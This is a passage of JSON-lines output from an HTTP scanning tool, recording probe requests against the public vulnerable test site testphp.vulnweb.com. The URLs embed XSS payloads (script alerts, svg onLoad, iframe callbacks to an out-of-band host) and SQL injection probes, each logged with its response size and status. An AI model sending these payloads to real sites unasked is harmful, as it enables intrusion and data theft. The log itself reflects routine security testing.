port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3Cifram\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3Cifram\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3Cifram\",\"time\":\"340.932551ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4982,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:53.89829532Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv\",\"time\":\"348.305663ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":521,\"lines\":105,\"status_code\":200,\"content_length\":4993,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:54.033002464Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffhnljeuznntumzdcj12cbq-dn-_jxrwote%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffhnljeuznntumzdcj12cbq-dn-_jxrwote%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffhnljeuznntumzdcj12cbq-dn-_jxrwote%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E\",\"time\":\"342.049ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":521,\"lines\":105,\"status_code\":200,\"content_length\":5055,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:54.12067131Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRip\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRip\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRip\",\"time\":\"339.967662ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4982,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:54.138559447Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07\",\"time\":\"345.178479ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4998,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:54.19754949Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07)%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07)%3C%2fscRipt%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRipt%3Ealert(0x106C07)%3C%2fscRipt%3E\",\"time\":\"353.222449ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5008,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:54.353318516Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC\",\"time\":\"344.105498ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5002,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:57.637253711Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0\",\"time\":\"356.968056ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:57.730571876Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0)%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0)%3C%2fscRipt%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRipt%3Enetsparker(0x004DC0)%3C%2fscRipt%3E\",\"time\":\"343.565586ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5013,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:57.824363583Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x106C07\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=%3CscRipt%3Enetsparker(0x106C07\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=%3CscRipt%3Enetsparker(0x106C07\",\"time\":\"349.007217ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5003,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:57.881841823Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist='\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist='\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist='\",\"time\":\"354.063609ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:58.25483789Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1\",\"time\":\"344.885639ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":653,\"lines\":110,\"status_code\":200,\"content_length\":7994,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:58.626143487Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10CONFIRMED\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1%20OR%2017-7%3d10CONFIRMED\",\"time\":\"347.42865ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4875,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:58.696659097Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%2017-7%3d10\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1%20OR%2017-7%3d10\",\"time\":\"346.739933ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2818,\"lines\":187,\"status_code\":200,\"content_length\":49413,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:58.877207548Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%25\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1%20OR%25\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1%20OR%25\",\"time\":\"356.384644ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:59.380046867Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026amp;asdf=ff\\u0026amp;cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026amp;asdf=ff\\u0026amp;cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=123\\u0026amp;asdf=ff\\u0026amp;cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E\",\"time\":\"349.431733ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:59.530217414Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026amp;asdf=ff\\u0026amp;cat=123DalFox\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026amp;asdf=ff\\u0026amp;cat=123DalFox\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=123\\u0026amp;asdf=ff\\u0026amp;cat=123DalFox\",\"time\":\"340.180786ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:01.168435876Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026asdf=ff\\u0026cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026asdf=ff\\u0026cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=123\\u0026asdf=ff\\u0026cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E\",\"time\":\"353.051682ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5013,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:02.24914272Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026asdf=ff\\u0026cat=123DalFox\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=123\\u0026asdf=ff\\u0026cat=123DalFox\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=123\\u0026asdf=ff\\u0026cat=123DalFox\",\"time\":\"341.633688ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4873,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:02.521788466Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=14\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=14\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=14\",\"time\":\"351.841859ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:02.841114745Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=14Database\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=14Database\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=14Database\",\"time\":\"349.015171ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4874,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:03.593119435Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=14DatabaseManipulationsSQL\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=14DatabaseManipulationsSQL\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=14DatabaseManipulationsSQL\",\"time\":\"345.222466ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4890,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:03.597395874Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=14DatabaseManipulations\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=14DatabaseManipulations\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=14DatabaseManipulations\",\"time\":\"349.334776ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4887,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:03.683293935Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1A01\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1A01\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1A01\",\"time\":\"349.784492ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:03.701249518Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1Attack\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1Attack\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1Attack\",\"time\":\"348.52523ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4871,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:03.751111695Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1Current\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1Current\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1Current\",\"time\":\"348.030645ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4872,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:03.966625753Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=1Database\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=1Database\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=1Database\",\"time\":\"352.16642ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4873,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.072335131Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=2\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=2\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=2\",\"time\":\"345.02558ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":498,\"lines\":103,\"status_code\":200,\"content_length\":5193,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.140974063Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=3\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=3\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=3\",\"time\":\"354.738127ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":477,\"lines\":103,\"status_code\":200,\"content_length\":4699,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.145775342Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?artist=test\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?artist=test\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?artist=test\",\"time\":\"343.826928ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.197955292Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat\",\"time\":\"352.109838ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.260578611Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=$%7Binjection\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=$%7Binjection\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=$%7Binjection\",\"time\":\"349.246644ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4985,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.409984684Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%2A\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%2A\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%2A\",\"time\":\"357.973126ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.474183131Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e\",\"time\":\"340.34766ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":521,\"lines\":105,\"status_code\":200,\"content_length\":4995,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:04.508813699Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffalfsrxrjwetv5xhynulh9krdrtzndh23g%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=%3Ciframe%20src%3d%22%2f%2fmv9e8mbvffalfsrxrjwetv5xhynulh9krdrtzndh23g%26%2346%3br87%26%2346%3bme%22%3E%3C%2fiframe%3E\",\"title\":\"pictures\",\